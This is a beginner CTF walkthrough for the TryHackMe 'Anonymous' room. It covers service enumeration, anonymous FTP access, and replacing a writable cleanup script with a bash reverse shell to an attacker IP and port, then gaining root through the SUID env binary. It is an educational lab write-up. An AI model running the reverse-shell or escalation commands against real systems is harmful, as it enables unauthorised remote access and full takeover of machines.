THM Anonymous Walkthrough

TryHackMe is a popular service that offers walktrough and CTF rooms in order to give people interested in infosec a playground to improve their current skills and obtain new knowledge and tricks. The TryHackMe Anonymous room is a very beginner-friendly CTF that is based on a poorly configured Samba share and FTP server, and escalating privileges up to root by using the SUID bit which allows normal users to run a certain application as sudo without entering a password or being in the sudoers list.

Before reading this THM Anonymous walkthrough you should have a basic understanding of FTP and Linux permissions.

Information Gathering

First, let's start with gathering some information using nmap:

sudo nmap -p 1-5000 -sV -O -v 10.10.62.117

Four services are running:

• vsftpd 2.0.8 or later on port 21
• OpenSSH 7.6p1 on port 22
• Samba on port 139 and 445

The running operating system seems to be Linux.

Now use smbmap to enumerate possible smb shares: smbmap -H 10.10.62.117

0[+] Guest session   	IP: 10.10.62.117:445	Name: 10.10.62.117                                      
1        Disk                                                  	Permissions	Comment
2	----                                                  	-----------	-------
3	print$                                            	NO ACCESS	Printer Drivers
4	pics                                              	READ ONLY	My SMB Share Directory for Pics
5	IPC$                                              	NO ACCESS	IPC Service (anonymous server (Samba, Ubuntu))

So, there are three shares and one seems to be accessible with a guest account.

Enumerate Samba and FTP

Using smbclient we can take a look at the public share called "pics":

smbclient \\\\10.10.62.117\\pics

Inside the share there is a jpg and a jpeg file, also we are not able to change our current working directory, so let's download the both image files to our local machine and investigate them. (To download a file use the get command)

At this point you can already answer the first four questions for the THM Anonymous room.

Next, let's try to log into the FTP service running using ftp 10.10.62.117 21. Use Anonymous as the username and leave the password blank. Luckily, anonymous log in is enabled on the server:

 0┌─[user@parrot-virtual]─[~/Desktop]
 1└──╼ $ftp 10.10.62.117 21
 2Connected to 10.10.62.117.
 3220 NamelessOne's FTP Server!
 4Name (10.10.62.117:user): Anonymous
 5331 Please specify the password.
 6Password:
 7230 Login successful.
 8Remote system type is UNIX.
 9Using binary mode to transfer files.
10ftp> 

In our cwd is a directory called scripts with the permission bits 777. Inside that directory are three files:

• clean.sh
• removed_files.log
• to_do.txt Download them to your local machine for further investigation.

The Samba share is actually not useful for this THM Anonymous walkthrough for us so feel free to forget about it.

Obtaining a reverse shell & the user flag

The log file as well as the todo file are not really interesting or useful but the bash script might be useful for getting access to the server.

The permission bits for clean.sh are 757 which means everyone is allowed to execute/read the file and we are allowed to write to it.

 0#!/bin/bash
 1
 2tmp_files=0
 3echo $tmp_files
 4if [ $tmp_files=0 ]
 5then
 6        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
 7else
 8    for LINE in $tmp_files; do
 9        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
10fi

The script itself doesn't have a real functionality because tmp_files will always be 0. So, let's give the script a real functionality:

0#!/bin/bash
1
2bash -i >& /dev/tcp/10.9.157.58/4545 0>&1

This should spawn a reverse shell on the THM Anonymous machine.

Start a netcat listener and upload the script to the server with put clean.sh after some time a shell should spawn.

Now you are able to read the user flag.

Rooting TryHackMe Anonymous

I checked for any interesting permission bits with: find / -perm -u=s -type f 2>/dev/null

First, I tried abusing pkexec with no success and then moved on to /usr/bin/env.

Running /usr/bin/env /bin/sh does not escalate our current privileges but adding -p to it will run the executable with SUID privileges: /usr/bin/env /bin/sh -p.

Now we escalated our privileges to root and are able to navigate to the root directory in order to extract the other flag.

Tags:

THM, TryHackMe, Anonymous